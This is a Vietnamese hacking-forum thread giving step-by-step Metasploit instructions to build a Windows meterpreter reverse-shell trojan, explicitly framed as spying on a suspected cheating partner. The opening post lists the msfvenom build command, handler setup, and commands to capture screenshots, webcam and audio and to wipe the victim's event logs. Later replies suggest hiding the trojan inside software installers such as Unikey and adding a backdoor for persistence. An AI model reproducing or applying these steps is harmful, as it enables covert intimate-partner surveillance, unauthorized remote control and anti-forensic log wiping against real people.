msfvenom-tao 1 trojan điều khiển máy nạn nhân

Thảo luận trong 'Tools' bắt đầu bởi khanhhoangbkdn, 22/10/16, 02:10 AM.

  1. khanhhoangbkdn

    khanhhoangbkdn VIP Members

    Tham gia: 07/10/16, 10:10 AM
    Bài viết: 67
    Đã được thích: 36
    Điểm thành tích:
    18
    Vào 1 đẹp trời bạn nghi ngờ người yêu bạn ngoại tình bạn không biết làm thế nào để xác nhận với có phải hay không ?
    Bước đầu tiên bạn hay tải về metasploits nếu bạn không có. và làm theo các bước dưới đây để xem ny làm gì trên máy tính :D

    B1: vào metasploits framework lệnh #msfconsole và tạo 1 trojan với lệnh
    #msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b '\x60' -f exe -only -o /root/quanlyny.exe

    [​IMG]



    -trojan này sẽ lưu lại với tên quanlyny.exe bằng cách nào đó copy qua máy victim và khoan hãy chạy lên

    B2:sử dụng exploits handler để lắng nghe kết nối của máy victim
    #use exploit/multi/handler

    [​IMG]



    #set payload windows/x64/meterpreter/reverse_tcp
    #set lhost myip(nếu cùng mạng thì gõ ifconfig để lấy ip của mình ,còn khác mạng thì vào trang https://www.whatismyip .com/ để xem ip public)
    #set lport 4444
    #exploit (đợi kết nối từ máy victim nếu victim chạy file quanlyny.exe thì sẽ có 1 session được tạo ra )

    B3:hiển thị session mới tạo ra #sessions -v
    Kết nối tới session với lệnh #sessions -i -1
    Bây giờ ta có 1 shell với meterpreter đến đây bạn có thể khai thác trên máy victim với các lệnh

    [​IMG]



    #screenshot //chụp màn hình victim
    #run webcam -l //Gọi webcam trên máy nạn nhân ta có
    #clearev //Xóa file log trên máy nạn nhân
    #run sound_recorder -h //ghi âm máy nạn nhân

    Còn nhiều lệnh nữa các bạn tự tìm hiểu
     
    Last edited by a moderator: 22/10/16, 10:10 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    Johnathan Huu Tri thích bài này.
  2. krone

    krone VIP Members

    Tham gia: 26/07/16, 03:07 PM
    Bài viết: 260
    Đã được thích: 138
    Điểm thành tích:
    43
    Bạn có cách nào để trojan auto khởi động không nhỉ :#
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. khanhhoangbkdn

    khanhhoangbkdn VIP Members

    Tham gia: 07/10/16, 10:10 AM
    Bài viết: 67
    Đã được thích: 36
    Điểm thành tích:
    18
    Bạn có thể chèn vào các file cài đặt như unikey chẳng hạn
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. Johnathan Huu Tri

    Johnathan Huu Tri New Member

    Tham gia: 14/03/20, 10:03 AM
    Bài viết: 1
    Đã được thích: 0
    Điểm thành tích:
    1
    Cho em hỏi nếu victim shutdown máy và không chạy file đó nữa thì mình cũng không kết nối được luôn đúng không ạ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 2,016
    Đã được thích: 485
    Điểm thành tích:
    83
    Đúng rồi bạn. Khi xâm nhập vào hệ thống bạn phải cần backdoor. Để khi nạn nhân mở lại máy tính, bạn vẫn nhận được kết nối shell tới máy tính nạn nhân...
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. TenlyAthony

    TenlyAthony New Member

    Tham gia: 12/09/21, 01:09 PM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    liệu có bốc lên điện thoại được không nhỉ các pro, iphone
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 2,016
    Đã được thích: 485
    Điểm thành tích:
    83
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    TenlyAthony thích bài này.
  8. TenlyAthony

    TenlyAthony New Member

    Tham gia: 12/09/21, 01:09 PM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 2,016
    Đã được thích: 485
    Điểm thành tích:
    83
    Có video đó bạn
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan